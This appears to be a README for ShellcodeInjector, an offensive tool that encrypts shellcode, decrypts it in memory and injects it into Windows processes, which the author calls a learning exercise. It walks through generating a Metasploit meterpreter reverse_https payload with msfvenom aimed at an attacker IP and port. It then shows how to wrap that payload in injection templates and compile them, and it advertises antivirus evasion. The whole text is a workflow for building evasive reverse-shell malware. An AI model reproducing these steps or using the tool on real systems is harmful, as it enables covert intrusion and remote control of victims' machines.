ShellcodeInjector takes a shellcode as input, encrypts it and then decrypts it in memory before performing process injection.
The idea of the project is to create process injection templates based on a list of Windows API functions.
This is just an excercise for me for learning C# and C++.
- For compiling C++ code, install mingw64 and udpate the System Variable PATH
- For compiling C# you can use
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
First, you need to obtain a shellcode, for example from metasploit,:
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<your-IP> LPORT=4444 -f raw > /tmp/msf64_reverse_https.raw
Then, you can generate the source code payloads
root@kali:~# python3 shellcode_encoder.py /tmp/msf64_reverse_https.raw RandomK3y domain.local
This will generate source code payloads and will save them in the results
folder. Then use compile64.bat to compile the source code payloads.
ShellcodeInjector is a Python v3 version of ShellcodeWrapper with additional process injection and AV evasion capabilities.